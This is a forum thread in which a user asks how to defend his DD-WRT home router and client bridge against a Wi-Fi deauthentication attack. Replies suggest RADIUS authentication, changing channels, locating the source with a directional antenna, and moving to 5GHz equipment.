Results 1 to 6 of 6

Thread: My ddwrt gateway / ddwrt client bridge is getting pwned... any ideas?

  1. #1
    Junior Member halgorithm's Avatar
    Join Date
    Mar 2006

    Question My ddwrt gateway / ddwrt client bridge is getting pwned... any ideas?

    First, a little backstory, (sorry in advance)

    I moved a half mile down the street along and in with the girlfriend. We found this apartment and it is kick ass. Turns out, after we moved in, the cable connection only comes into the living room and the 2nd bedroom, my office, is at the very far end of the 1100 square foot apartment. I wanted to run some cat5, but she says no and it's a little ugly all along the floor and bordering the 4 doors it passes. We each also have a laptop that has wifi so I figured I can just drop a usb connector into my pc.

    So I go wifi as my main connection right? Uh it's horrible! Maybe my problem is just Vista, but any USB wifi devices I use (I have three of them) are all crap and lose their connection over the course of 1-2 days. Ubuntu did the same thing with one of them, and I didn't feel like playing with the others. So after a month I dug through my computer part bins...

    I took my old belkin crap router and tftped some ddwrt goodness on to it. Then I bridged the connection to my main router (also running ddwrt)

    Working very well, solid for a full week, or so I thought... it was flaking out and figured I'd run kismet to see where and why the packets were dropping, and between what room. Turns out, someone is doing a Deauthenitcate / Disassociate attack on my main router. So then I did a test and unplugged the ddwrt client bridge, thinking that perchance I fubared up something. The attacks continued on my router and also on others from what I could tell from what I could see from kismet and airodump.

    So other than not using wireless and decreasing the power any further (I'm already at 30 and anything less I drop) - any ideas on how I can mitigate an attack?

    This is what I have going so far:

    Standard SSID non broadcast 10 char non special character, but not in the top 1000 ssids...

    WPA-PSK AES 63 character passkey in hex (I'd change to wpa2, but the bridge doesn't work)

    *mac filter is not working currently on the router, I just found this out a half hour ago and investigating... Not even sure if I should bother considering they can clone my macs and the originating mac keeps changing from what I can see.


    I'm trying to think of a practical solution and not wallpapering alum foil or living in a faray cage. If there isn't much of an idea for the wifi, I'll probably run ethernet for the main pc and try filters and whatnot. I'd have the cable company install coax in the bedroom, but the apartment management won't let it fly.

    Throwing money at the problem like getting ethernet over power adapters may help, but I'd like to pick the brains of anyone that has spent more time doing the wifi defense then myself. I love a good challenge and I'm wondering how I should proceed. I thought about taking a spare pc or a vm and setting up fakeap or something along those lines.

    Any feedback is appreciated, even if you tell me to smeg off.

  2. #2
    Just burned his ISO
    Join Date
    Jun 2006


    i havent tried this myself but, try putting a radius auth server

  3. #3
    Senior Member
    Join Date
    Apr 2008


    Since you say that you use WPA encryption with a 63 character key and none standard SSID you at least do not have to fear that the attacker will actually crack your connection. The problem therefore most likely comes down to how persistent in his attempts the person is and how long it will take for him to give up. If we assume that the attacker actually is trying to crack your encryption, as opposed to just annoy you, there would be no reason for him to keep de-authenticating your clients after he has obtained the WPA handshake. After this the rest of his attempt to crack your WPA key can be carried out offline, and since you use a long passphrase he will be kept busy for quite a while until he finally decides to give up.

    If the de-authentication attacks do keep coming you could always get a directional wireless antenna and using for example kismet track down his approximate location using the power readings. Chances are that it is one of your loving neighbours and most likely a friendly visit will scare him enough to stop bothering you.

    Another completely unrelated possibility is that your AP simply is broadcasting on the same channel as another strong AP nearby and that this is the reason for the inconsistent connection. This can easily be checked using kismet and the channel then changed to a less crowded one if needed.
    -Monkeys are like nature's humans.

  4. #4
    Junior Member halgorithm's Avatar
    Join Date
    Mar 2006


    Thanks for the feedback. Yeah, I'd have to agree that a Radius would probably help add another layer of protection. Thanks Pipedream.

    Tron, I'm on chan 11 right now, and it appears to be only shared with one other AP in the area, and that one comes up with an average power of 5 or so. But yes, I'll try switching channels for a bit, maybe even some jiffy pop antenna redirectors or something.

    Glancing at my router and the laptop running Kismet, I don't see any more floods after 12am on my router or going across the area nor has my router needed a restart.

    In any case, I'm going to do a hard reset on my router, update the firmware, and another hard reset to see if I can get the mac table working correctly.


  5. #5
    Just burned his ISO
    Join Date
    Oct 2009

    Wink Try 802.11a

    I know it costs, but you could get some 802.11a 5GHz equipment? Not so many kiddy crackers will have it and stick to the common 2.4GHz b/g/n.

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010


    Quote Originally Posted by cynicalsoothsayer View Post
    I know it costs, but you could get some 802.11a 5GHz equipment? Not so many kiddy crackers will have it and stick to the common 2.4GHz b/g/n.
    Welcome to the forums. It might be a good idea for you to re-read the rules you agreed to.
    Not to mention that it is considered bad form to dig up a thread that is over a year old.
    To be successful here you should read all of the following.
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts